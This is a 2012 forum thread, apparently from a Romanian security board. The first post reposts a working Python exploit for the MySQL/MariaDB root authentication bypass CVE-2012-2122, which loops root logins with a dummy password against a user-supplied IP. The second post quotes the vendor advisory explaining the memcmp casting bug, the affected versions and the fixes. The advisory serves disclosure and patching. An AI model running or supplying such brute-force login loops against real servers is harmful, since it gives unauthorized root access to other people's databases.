The_Arhitect Posted June 13, 2012 Report Posted June 13, 2012 MySQL Remote Root Authentication Bypass#!/usr/bin/python### This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.## Title: MySQL Remote Root Authentication Bypass# Written by: Dave Kennedy (ReL1K)# http://www.secmaniac.com## Original advisory here: seclists.org/oss-sec/2012/q2/493import subprocessipaddr = raw_input("Enter the IP address of the mysql server: ")while 1: subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()Sursa: MySQL Remote Root Authentication Bypass Quote
Flubber Posted June 14, 2012 Report Posted June 14, 2012 Nici mie nu prea mi-a venit a crede insa mai jos este explicatia (sursa: oss-sec: Security vulnerability in MySQL/MariaDB sql/password.c specificata si in articol/exploit)All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 arevulnerable.MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.This issue got assigned an id CVE-2012-2122.Here's the issue. When a user connects to MariaDB/MySQL, a token (SHAover a password and a random scramble string) is calculated and comparedwith the expected value. Because of incorrect casting, it might'vehappened that the token and the expected value were considered equal,even if the memcmp() returned a non-zero value. In this caseMySQL/MariaDB would think that the password is correct, even while it isnot. Because the protocol uses random strings, the probability ofhitting this bug is about 1/256.Which means, if one knows a user name to connect (and "root" almostalways exists), she can connect using *any* password by repeatingconnection attempts. ~300 attempts takes only a fraction of second, sobasically account password protection is as good as nonexistent. Any client will do, there's no need for a special libmysqlclient library.But practically it's better than it looks - many MySQL/MariaDB buildsare not affected by this bug.Whether a particular build of MySQL or MariaDB is vulnerable, depends onhow and where it was built. A prerequisite is a memcmp() that can returnan arbitrary integer (outside of -128..127 range). To my knowledge gccbuiltin memcmp is safe, BSD libc memcmp is safe. Linux glibcsse-optimized memcmp is not safe, but gcc usually uses the inlinedbuiltin version.As far as I know, official vendor MySQL and MariaDB binaries are notvulnerable.Regards,Sergei GolubchikMariaDB Security CoordinatorReferences:MariaDB bug report: [URL]https://mariadb.atlassian.net/browse/MDEV-212[/URL]MariaDB fix: [URL="http://bazaar.launchpad.net/%7Emaria-captains/maria/5.1/revision/3144"]http://bazaar.launchpad.net/~maria-captains/maria/5.1/revision/3144[/URL]MySQL bug report: [URL="http://bugs.mysql.com/bug.php?id=64884"]MySQL Bugs: #64884: logins with incorrect password are allowed[/URL]MySQL fix: [URL="http://bazaar.launchpad.net/%7Emysql/mysql-server/5.1/revision/3560.10.17"]http://bazaar.launchpad.net/~mysql/mysql-server/5.1/revision/3560.10.17[/URL]MySQL changelog: [URL="http://dev.mysql.com/doc/refman/5.1/en/news-5-1-63.html"]MySQL :: MySQL 5.1 Reference Manual :: D.1.2 Changes in MySQL 5.1.63 (07 May 2012)[/URL] [URL="http://dev.mysql.com/doc/refman/5.5/en/news-5-5-24.html"]MySQL :: MySQL 5.5 Reference Manual :: D.1.3 Changes in MySQL 5.5.24 (07 May 2012)[/URL] Quote